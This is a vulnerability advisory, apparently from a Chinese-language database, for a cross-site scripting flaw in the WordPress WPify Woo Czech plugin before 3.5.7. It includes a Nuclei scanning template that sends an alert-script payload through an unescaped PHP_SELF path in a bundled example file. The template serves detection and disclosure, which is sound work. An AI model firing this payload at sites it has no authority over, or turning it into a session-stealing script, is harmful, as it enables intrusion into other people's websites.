wpify-woo-czech-xss: WordPress WPify Woo Czech <3.5.7 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress WPify Woo Czech | POC: 已公开

漏洞描述

WordPress WPify Woo Czech plugin before 3.5.7 contains a cross-site scripting vulnerability. The plugin uses the Vies library 2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first. The issue is only exploitable when the web server has the PDO driver installed and write access to the example directory.

PoC代码[已公开]

id: wpify-woo-czech-xss

info:
  name: WordPress WPify Woo Czech <3.5.7 - Cross-Site Scripting
  author: Akincibor
  severity: high
  description: WordPress WPify Woo Czech plugin before 3.5.7 contains a cross-site scripting vulnerability. The plugin uses the Vies library 2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first. The issue is only exploitable when the web server has the PDO driver installed and write access to the example directory.
  reference:
    - https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
  tags: wp,wordpress,xss,wp-plugin,wpify,wpscan,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'
          - 'Add a new VAT ID to the queue'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b18b6e7e112d0fa9f18f022f3e01717bd0743a4c1d3a8140dc25065df07f7a1e022100ee845da4860f5c433ec1d92a469e21481a6b5df34cfc32b8fc36c1c52fed83b4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐